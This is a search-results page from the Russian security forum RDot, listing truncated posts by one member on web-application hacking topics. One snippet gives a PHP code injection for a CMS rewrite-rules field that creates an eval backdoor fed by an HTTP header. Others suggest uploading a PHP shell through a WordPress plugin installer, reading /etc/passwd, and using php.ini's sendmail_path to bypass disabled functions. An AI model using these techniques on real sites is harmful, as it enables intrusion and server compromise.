Вернуться   RDot: White Hat Security Community > Поиск по форуму

Показано с 1 по 25 из 30.
На поиск затрачено 0.00 сек.
Поиск: Сообщения от: Лаврушкин
Раздел: Обратная связь/Feedback 05.06.2019, 22:06
Ответов: 22
Важно: RDot.Org EOL Notice
Просмотров: 93,617
Автор Лаврушкин
Если делать совсем нечего,...

Если делать совсем нечего, то идея с архивом - пусть будет. Не знаю что там в ваших приватах, но и паблик...
Раздел: Форумы 17.01.2016, 14:14
Ответов: 6
Просмотров: 44,227
Автор Лаврушкин
А блинд на каком-то движке?...

А блинд на каком-то движке? Попробуй базу прошустрить на наличие путей.
если там пых и error_reporting позволяет -...
Раздел: Web-среда/Web-applications 09.11.2015, 01:40
Ответов: 3,619
Просмотров: 3,937,429
Автор Лаврушкин
Подробно разобрано...

Подробно разобрано https://rdot.org/forum/showthread.php?t=926
в особенности https://rdot.org/forum/showpost.php?p=10994&postcount=27
Раздел: Web-среда/Web-applications 08.11.2015, 17:01
Ответов: 3,619
Просмотров: 3,937,429
Автор Лаврушкин
Не уверен, но посмотри...

Не уверен, но посмотри http://www.slideshare.net/qqlan/database-honeypot-by-design-25195927
В подробностях не разбирал.
Раздел: Коммерция/Сommerce 27.10.2015, 15:55
Ответов: 93
Просмотров: 160,836
Автор Лаврушкин
Оплатил для теста на...

Оплатил для теста на неделю тариф TripleVPN.
Пробовал подключится к 2 входным(SE1,UK1) и 6 выходным серверам -...
Раздел: Оффтоп/Offtopic 30.06.2015, 14:18
Ответов: 9
Просмотров: 11,539
Автор Лаврушкин
Кидать уже некого было, вот...

Кидать уже некого было, вот и закрылись.
1337day и скаммер это уже синонимы, теперь вон на конференции в...
Раздел: Web-среда/Web-applications 29.05.2015, 16:20
Ответов: 3,619
Просмотров: 3,937,429
Автор Лаврушкин
Попробуй в плагин-инсталл...

Попробуй в плагин-инсталл в лоб скормить ему php файл. далее ищи свой файл в папке wp-content/uploads/год/месяц/файл,...
Раздел: Сценарии/CMF/СMS 25.09.2014, 16:36
Ответов: 6
Просмотров: 24,486
Автор Лаврушкин
Это работает только со...

Это работает только со старыми версиями WP. где ключ для восстановления в чистом виде лежит в базе.
В новых...
Раздел: Оффтоп/Offtopic 08.09.2014, 17:06
Ответов: 6
Просмотров: 10,335
Автор Лаврушкин
Не уверен насчёт 1400 за...

Не уверен насчёт 1400 за сутки на ип. подряд - может быть. а если использовать таймайут небольшой между...
Раздел: Релизы/Releases 29.07.2014, 17:25
Ответов: 43
Просмотров: 184,943
Автор Лаврушкин
В бинге изменилась выдача....

В бинге изменилась выдача. и теперь там кстати много мусора непонятного.
в файле
classes/class.CBingReverseIP.php
измени...
Раздел: Квесты/CTF 27.05.2014, 16:22
Ответов: 8
Просмотров: 28,769
Автор Лаврушкин
Жаль что такой маленький...

Жаль что такой маленький обхват был сервисов майлру. у майлру дофигища поддоменов. и как показывает история,...
Раздел: Форумы 12.04.2014, 13:21
Ответов: 10
Просмотров: 38,699
Автор Лаврушкин
Если стили взять например....

Если стили взять например. там theme_info.cfg хотябы правится?(по стандартным путям) права на запись есть? Edit Theme...
Раздел: Web-среда/Web-applications 20.03.2014, 02:07
Ответов: 1
Просмотров: 10,504
Автор Лаврушкин
Заходишь в Custom Rewrite Rules ...

Заходишь в
Custom Rewrite Rules

Пишешь там

'rdot\' => ');@eval($_SERVER[HTTP_EVAL]);(1//'
И не забудь передать EVAL через HTTP-хидеры.
Раздел: Форумы 31.10.2013, 16:45
Ответов: 1
Просмотров: 20,763
Автор Лаврушкин
А подробнее можно?

А подробнее можно?
Раздел: Форумы 18.05.2013, 12:41
Ответов: 7
Просмотров: 28,579
Автор Лаврушкин
функция create_thumbnail в ласт...

функция create_thumbnail в ласт версии phpbb без изменения.
выше в этой функции есть ещё условия. быть может они не...
Раздел: Уязвимости PHP/PHP vulnerabilities 05.02.2013, 21:49
Ответов: 7
Просмотров: 22,218
Автор Лаврушкин
Насколько я помню, то с...

Насколько я помню, то с абсолютным путем эта штука не работает. и более универсальным считалась точка '.' )
Раздел: Повышение привилегий/Privilege escalation 28.12.2012, 15:01
Ответов: 12
Просмотров: 23,564
Автор Лаврушкин
Тестил кто?

Тестил кто?
Раздел: Статьи/Articles 21.09.2012, 11:08
Ответов: 67
Просмотров: 233,006
Автор Лаврушкин
ссылка...

ссылка http://php.net/manual/ru/wrappers.php более информативна. хотябы примеров что ли больше привел.
Раздел: Web-среда/Web-applications 18.06.2012, 16:56
Ответов: 8
Просмотров: 12,802
Автор Лаврушкин
Покажи реализацию чтения...

Покажи реализацию чтения например /etc/passwd
Раздел: Форумы 23.04.2012, 00:23
Ответов: 7
Просмотров: 28,579
Автор Лаврушкин
Навеяло пред темой. Идем...

Навеяло пред темой.
Идем в General->Attachment settings
Ставим галочки на Allow attachments,Display images inline,Create thumbnail
Там есть Imagemagick...
Раздел: Web-среда/Web-applications 20.04.2012, 15:01
Ответов: 21
Просмотров: 32,807
Автор Лаврушкин
Нет не винда была. ответ...

Нет не винда была. ответ нашёл сам. в шестом посте. Кстати на Win это не прокатит.
Расскажи про вариант с Win.
Раздел: Web-среда/Web-applications 16.04.2012, 02:33
Ответов: 21
Просмотров: 32,807
Автор Лаврушкин
Можно. Покурил сурсы пыха...

Можно.
Покурил сурсы пыха и разобрался.
оказывается sendmail_path попадает в popen.
Сотвественно можно херачить...
Раздел: Web-среда/Web-applications 15.04.2012, 22:43
Ответов: 21
Просмотров: 32,807
Автор Лаврушкин
Там он как то автоматом...

Там он как то автоматом чтоли подгружает через какое то время. ещё пока не разобрался. но соль в том что...
Раздел: Web-среда/Web-applications 15.04.2012, 19:40
Ответов: 21
Просмотров: 32,807
Автор Лаврушкин
php.ini и выполнение команд

Приветствую.
Такая ситуация.
disable_functions = exec,system...etc
Есть возможность редактирования php.ini.
Пытался...
Раздел: Уязвимости PHP/PHP vulnerabilities 22.12.2011, 10:32
Ответов: 8
Просмотров: 16,489
Автор Лаврушкин
На багтрекере пхп это...

На багтрекере пхп это светилось как минимум пару раз.
Показано с 1 по 25 из 30.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot